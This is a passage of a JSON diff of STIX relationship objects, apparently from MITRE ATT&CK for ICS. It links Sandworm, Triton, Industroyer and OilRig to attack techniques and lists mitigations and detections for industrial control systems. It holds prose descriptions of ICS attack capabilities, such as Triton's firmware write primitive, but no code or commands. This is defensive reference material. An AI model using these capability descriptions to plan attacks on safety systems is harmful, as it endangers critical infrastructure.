Defeating CRASHOVERRIDE. Retrieved December 18, 2020.", + "url": "https://www.dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-07T17:51:39.294Z", + "description": "During the [2016 Ukraine Electric Power Attack](https://attack.mitre.org/campaigns/C0025), [Sandworm Team](https://attack.mitre.org/groups/G0034) used MS-SQL access to a pivot machine, allowing code execution throughout the ICS network.(Citation: Dragos Crashoverride 2018)", + "relationship_type": "uses", + "source_ref": "campaign--aa73efef-1418-4dbe-b43c-87a498e97234", + "target_ref": "attack-pattern--e1f9cdd2-9511-4fca-90d7-f3e92cfdd0bf", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--591620d3-5549-49db-9080-43f86a68a590", + "created": "2021-04-13T12:08:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "DHS CISA February 2019", + "description": "DHS CISA 2019, February 27 MAR-17-352-01 HatManSafety System Targeted Malware (Update B) Retrieved. 2019/03/08 ", + "url": "https://ics-cert.us-cert.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%20-%20Safety%20System%20Targeted%20Malware%20%28Update%20B%29.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T18:25:07.936Z", + "description": "[Triton](https://attack.mitre.org/software/S1009) leverages a previously-unknown vulnerability affecting Tricon MP3008 firmware versions 10.010.4 allows an insecurely-written system call to be exploited to achieve an arbitrary 2-byte write primitive, which is then used to gain supervisor privileges. (Citation: DHS CISA February 2019)", + "relationship_type": "uses", + "source_ref": "malware--80099a91-4c86-4bea-9ccb-dac55d61960e", + "target_ref": "attack-pattern--cfe68e93-ce94-4c0f-a57d-3aa72cedd618", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--d8354850-bd4c-4bd9-a585-b107f5f1398f", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Blake Johnson, Dan Caban, Marina Krotofil, Dan Scali, Nathan Brubaker, Christopher Glyer December 2017", + "description": "Blake Johnson, Dan Caban, Marina Krotofil, Dan Scali, Nathan Brubaker, Christopher Glyer 2017, December 14 Attackers Deploy New ICS Attack Framework TRITON and Cause Operational Disruption to Critical Infrastructure Retrieved. 2018/01/12 ", + "url": "https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T18:28:39.359Z", + "description": "[Triton](https://attack.mitre.org/software/S1009) has the capability to reprogram the SIS logic to allow unsafe conditions to persist or reprogram the SIS to allow an unsafe state while using the DCS to create an unsafe state or hazard. (Citation: Blake Johnson, Dan Caban, Marina Krotofil, Dan Scali, Nathan Brubaker, Christopher Glyer December 2017)", + "relationship_type": "uses", + "source_ref": "malware--80099a91-4c86-4bea-9ccb-dac55d61960e", + "target_ref": "attack-pattern--5fa00fdd-4a55-4191-94a0-564181d7fec2", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--10626671-941d-4a82-a835-56059058ef87", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.065Z", + "relationship_type": "mitigates", + "description": "Use host-based allowlists to prevent devices from accepting connections from unauthorized systems. For example, allowlists can be used to ensure devices can only connect with master stations or known management/engineering workstations. (Citation: Department of Homeland Security September 2016)\n", + "source_ref": "course-of-action--aadac250-bcdc-44e3-a4ae-f52bd0a7a16a", + "target_ref": "attack-pattern--19a71d1e-6334-4233-8260-b749cae37953", + "external_references": [ + { + "source_name": "Department of Homeland Security September 2016", + "description": "Department of Homeland Security 2016, September Retrieved. 2020/09/25 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--52c7176b-431d-44a6-8c03-7c15a8cf6ce1", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.133Z", + "relationship_type": "mitigates", + "description": "Provide operators with redundant, out-of-band communication to support monitoring and control of the operational processes, especially when recovering from a network outage (Citation: National Institute of Standards and Technology April 2013). Out-of-band communication should utilize diverse systems and technologies to minimize common failure modes and vulnerabilities within the communications infrastructure. For example, wireless networks (e.g., 3G, 4G) can be used to provide diverse and redundant delivery of data.\n", + "source_ref": "course-of-action--b11cad63-ef30-4eb8-af0d-6cc46eef3f3e", + "target_ref": "attack-pattern--b5b9bacb-97f2-4249-b804-47fd44de1f95", + "external_references": [ + { + "source_name": "National Institute of Standards and Technology April 2013", + "description": "National Institute of Standards and Technology 2013, April Security and Privacy Controls for Federal Information Systems and Organizations Retrieved. 2020/09/17 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53r4.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--276aa6a6-e700-470a-8f72-02537ba7be9d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.128Z", + "relationship_type": "mitigates", + "description": "Configure features related to account use like login attempt lockouts, specific login times, and password strength requirements as examples. Consider these features as they relate to assets which may impact safety and availability. (Citation: Keith Stouffer May 2015)\n", + "source_ref": "course-of-action--86b455f2-fb63-4043-93a8-32a3a7703a02", + "target_ref": "attack-pattern--8d2f3bab-507c-4424-b58b-edc977bd215c", + "external_references": [ + { + "source_name": "Keith Stouffer May 2015", + "description": "Keith Stouffer 2015, May Guide to Industrial Control Systems (ICS) Security Retrieved. 2018/03/28 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--0491ef92-2941-4841-9fe6-2e1809788b52", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.210Z", + "relationship_type": "mitigates", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses. Perform periodic integrity checks of the device to validate the correctness of the firmware, software, programs, and configurations. Integrity checks, which typically include cryptographic hashes or digital signatures, should be compared to those obtained at known valid states, especially after events like device reboots, program downloads, or program restarts.\n", + "source_ref": "course-of-action--bcf91ebc-f316-4e19-b2f6-444e9940c697", + "target_ref": "attack-pattern--5e0f75da-e108-4688-a6de-a4f07cc2cbe3", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--6eaf727c-fec3-4e63-8852-eee27c44d596", + "created": "2022-09-27T15:23:19.486Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T19:47:06.144Z", + "description": "Monitor for newly constructed files from a spearphishing emails with a malicious attachment in an attempt to gain access to victim systems.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c", + "target_ref": "attack-pattern--648f995e-9c3a-41e4-aeee-98bb41037426", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--9b825e77-2b18-4bc8-8e1d-5f645d570dca", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Dragos Xenotime 2018", + "description": "Dragos, Inc.. (n.d.). Xenotime. Retrieved April 16, 2019.", + "url": "https://dragos.com/resource/xenotime/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-11-23T21:06:25.384Z", + "description": "(Citation: Dragos Xenotime 2018)", + "relationship_type": "uses", + "source_ref": "intrusion-set--9538b1a4-4120-4e2d-bf59-3b11fcab05a4", + "target_ref": "malware--80099a91-4c86-4bea-9ccb-dac55d61960e", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.0.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--c78f497f-01c3-4efb-aa74-92b700b9c02b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.186Z", + "relationship_type": "mitigates", + "description": "When at rest, project files should be encrypted to prevent unauthorized changes. (Citation: National Institute of Standards and Technology April 2013)\n", + "source_ref": "course-of-action--9f99fcfd-772e-4e63-9d39-e45612e546dc", + "target_ref": "attack-pattern--e72425f8-9ae6-41d3-bfdb-e1b865e60722", + "external_references": [ + { + "source_name": "National Institute of Standards and Technology April 2013", + "description": "National Institute of Standards and Technology 2013, April Security and Privacy Controls for Federal Information Systems and Organizations Retrieved. 2020/09/17 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53r4.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--ade12d27-13bb-4ebf-be08-7039cf699682", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.065Z", + "relationship_type": "mitigates", + "description": "Utilize network allowlists to restrict unnecessary connections to network devices (e.g., comm servers, serial to ethernet converters) and services, especially in cases when devices have limits on the number of simultaneous sessions they support.\n", + "source_ref": "course-of-action--aadac250-bcdc-44e3-a4ae-f52bd0a7a16a", + "target_ref": "attack-pattern--2900bbd8-308a-4274-b074-5b8bde8347bc", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--be950e87-80ac-49ea-810a-553c7f72151b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.073Z", + "relationship_type": "mitigates", + "description": "Devices should authenticate all messages between master and outstation assets.\n", + "source_ref": "course-of-action--72e46e53-e12d-4106-9c70-33241b6ed549", + "target_ref": "attack-pattern--8e7089d3-fba2-44f8-94a8-9a79c53920c4", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--8af89a9b-3e95-45f4-a51d-223b1c82db9c", + "created": "2022-09-26T16:50:56.298Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T16:50:56.298Z", + "description": "Monitor for a loss of network communications, which may indicate a device has been shutdown or restarted. This will not directly detect the technique’s execution, but instead may provide additional evidence that the technique has been used and may complement other detections.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a", + "target_ref": "attack-pattern--25dfc8ad-bd73-4dfd-84a9-3c3d383f76e9", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--1a40cec9-47c3-404e-b039-b7ae83ffaf68", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.106Z", + "relationship_type": "mitigates", + "description": "Ensure all browsers and plugins are kept updated to help prevent the exploit phase of this technique. Use modern browsers with security features enabled.\n", + "source_ref": "course-of-action--97f33c84-8508-45b9-8a1d-cac921828c9e", + "target_ref": "attack-pattern--7830cfcf-b268-4ac0-a69e-73c6affbae9a", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--83c29179-4805-403a-acf5-5151c4d2e556", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Anton Cherepanov, ESET June 2017", + "description": "Anton Cherepanov, ESET 2017, June 12 Win32/Industroyer: A new threat for industrial control systems Retrieved. 2017/09/15 ", + "url": "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-23T18:27:02.814Z", + "description": "[Industroyer](https://attack.mitre.org/software/S0604)'s OPC and IEC 61850 protocol modules include the ability to send stVal requests to read the status of operational variables. (Citation: Anton Cherepanov, ESET June 2017)", + "relationship_type": "uses", + "source_ref": "malware--e401d4fe-f0c9-44f0-98e6-f93487678808", + "target_ref": "attack-pattern--2d0d40ad-22fa-4cc8-b264-072557e1364b", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--ccab2b58-7c47-45fe-bdd3-3444fb53760c", + "created": "2022-09-27T15:34:07.320Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-27T15:34:07.320Z", + "description": "Monitor DLL file events, specifically creation of these binary files as well as the loading of DLLs into processes associated with remote graphical connections, such as RDP and VNC. [Remote Services](https://attack.mitre.org/techniques/T0886) may be used to access a host’s GUI.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--c0a4a086-cc20-4e1e-b7cb-29d99dfa3fb1", + "target_ref": "attack-pattern--b0628bfc-5376-4a38-9182-f324501cb4cf", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--1f804c9f-3b65-47eb-89f3-83edd0422fdc", + "created": "2022-05-11T16:22:58.807Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T19:34:32.554Z", + "description": "Monitor for changes made to files that may stop or disable services on a system to render those services unavailable to legitimate users.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--84572de3-9583-4c73-aabd-06ea88123dd8", + "target_ref": "attack-pattern--063b5b92-5361-481a-9c3f-95492ed9a2d8", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--7a79ff35-319a-4e7d-b8c7-72f0bb0f8978", + "created": "2022-09-26T14:29:33.111Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T14:29:33.111Z", + "description": "Various techniques enable spoofing a reporting message. Monitor for LLMNR/NBT-NS poisoning via new services/daemons which may be used to enable this technique. For added context on adversary procedures and background see [LLMNR/NBT-NS Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001).", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--da85d358-741a-410d-9433-20d6269a6170", + "target_ref": "attack-pattern--8535b71e-3c12-4258-a4ab-40257a1becc4", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--c726e8af-9b98-4ce9-b8f4-3e82e59d5374", + "created": "2022-09-26T14:35:27.430Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T14:35:27.430Z", + "description": "Monitor for new or unexpected connections to controllers, which could indicate an Unauthorized Command Message being sent via [Rogue Master](https://attack.mitre.org/techniques/T0848).", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a", + "target_ref": "attack-pattern--40b300ba-f553-48bf-862e-9471b220d455", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--3618a010-b94b-4974-b1be-7630d5c853c1", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Robert Falcone, Bryan Lee May 2016", + "description": "Robert Falcone, Bryan Lee 2016, May 26 The OilRig Campaign: Attacks on Saudi Arabian Organizations Deliver Helminth Backdoor Retrieved. 2019/11/19 ", + "url": "https://unit42.paloaltonetworks.com/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T16:31:19.923Z", + "description": "[OilRig](https://attack.mitre.org/groups/G0049) used spearphishing emails with malicious Microsoft Excel spreadsheet attachments. (Citation: Robert Falcone, Bryan Lee May 2016)", + "relationship_type": "uses", + "source_ref": "intrusion-set--4ca1929c-7d64-4aab-b849-badbfc0c760d", + "target_ref": "attack-pattern--648f995e-9c3a-41e4-aeee-98bb41037426", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--f3810d69-0eff-4d62-bdf1-2870cf676bba", + "created": "2023-03-30T14:11:33.618Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-30T14:11:33.618Z", + "description": "Monitor for device credential changes observable in automation or management network protocols.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--fab8fc7d-f27f-4fbb-9de6-44740aade05f", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--bbf297d3-0c3c-44be-b780-332bac17b0ba", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.222Z", + "relationship_type": "mitigates", + "description": "Devices should authenticate all messages between master and outstation assets.\n", + "source_ref": "course-of-action--72e46e53-e12d-4106-9c70-33241b6ed549", + "target_ref": "attack-pattern--40b300ba-f553-48bf-862e-9471b220d455", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--77821dbb-367e-455f-bcae-b87412e88f1b", + "created": "2022-09-26T16:56:53.939Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T16:56:53.940Z", + "description": "Monitor asset management systems for device configuration changes which can be used to understand expected parameter settings.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--b05a614b-033c-4578-b4f2-c63a9feee706", + "target_ref": "attack-pattern--097924ce-a9a9-4039-8591-e0deedfb8722", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--eecca3e7-4db5-40d4-b04c-13f84701acb3", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Department of Homeland Security October 2009", + "description": "Department of Homeland Security 2009, October Developing an Industrial Control Systems Cybersecurity Incident Response Capability Retrieved. 2020/09/17 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/final-RP_ics_cybersecurity_incident_response_100609.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-19T21:23:52.947Z", + "description": "Take and store data backups from end user systems and critical servers. Ensure backup and storage systems are hardened and kept separate from the corporate network to prevent compromise. Maintain and exercise incident response plans (Citation: Department of Homeland Security October 2009), including the management of gold-copy back-up images and configurations for key systems to enable quick recovery and response from adversarial activities that impact control, view, or availability.\n", + "relationship_type": "mitigates", + "source_ref": "course-of-action--ad12819e-3211-4291-b360-069f280cff0a", + "target_ref": "attack-pattern--138979ba-0430-4de6-a128-2fc0b056ba36", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--a6479493-6154-408f-90df-9d2f3ae352d1", + "created": "2023-03-31T17:46:01.470Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Dragos Crashoverride 2018", + "description": "Joe Slowik. (2018, October 12). Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE. Retrieved December 18, 2020.", + "url": "https://www.dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-07T17:06:53.070Z", + "description": "During the [2016 Ukraine Electric Power Attack](https://attack.mitre.org/campaigns/C0025), [Sandworm Team](https://attack.mitre.org/groups/G0034) used valid accounts to laterally move through VPN connections and dual-homed systems.(Citation: Dragos Crashoverride 2018)", + "relationship_type": "uses", + "source_ref": "campaign--aa73efef-1418-4dbe-b43c-87a498e97234", + "target_ref": "attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--139bb9e7-e5fd-4366-b2e6-4f74a73ec984", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.071Z", + "relationship_type": "mitigates", + "description": "Unauthorized connections can be prevented by statically defining the hosts and ports used for automation protocol connections.\n", + "source_ref": "course-of-action--52c7a1a9-3a78-4528-a44f-cd7b0fa3541a", + "target_ref": "attack-pattern--3f1f4ccb-9be2-4ff8-8f69-dd972221169b", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--57e8711a-9aae-4a22-94d4-f4c8a3a8f141", + "created": "2023-03-31T18:12:35.414Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "ESET Industroyer", + "description": "Anton Cherepanov. (2017, June 12). Win32/Industroyer: A new threat for industrial controls systems. Retrieved December 18, 2020.", + "url": "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf" + }, + { + "source_name": "Dragos Crashoverride 2018", + "description": "Joe Slowik. (2018, October 12). Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE. Retrieved December 18, 2020.", + "url": "https://www.dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-07T17:07:29.299Z", + "description": "Within the [2016 Ukraine Electric Power Attack](https://attack.mitre.org/campaigns/C0025), [Industroyer](https://attack.mitre.org/software/S0604) was used to target and disrupt the Ukrainian power grid substation components.(Citation: Dragos Crashoverride 2018)(Citation: ESET Industroyer)", + "relationship_type": "uses", + "source_ref": "campaign--aa73efef-1418-4dbe-b43c-87a498e97234", + "target_ref": "malware--e401d4fe-f0c9-44f0-98e6-f93487678808", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--1c3d966a-5995-48ed-919d-25b972010fe9", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.180Z", + "relationship_type": "mitigates", + "description": "Provide the ability to verify the integrity of control logic or programs loaded on a controller. While techniques like CRCs and checksums are commonly used, they are not cryptographically strong and can be vulnerable to collisions. Preferably cryptographic hash functions (e.g., SHA-2, SHA-3) should be used. (Citation: IEC February 2019)\n", + "source_ref": 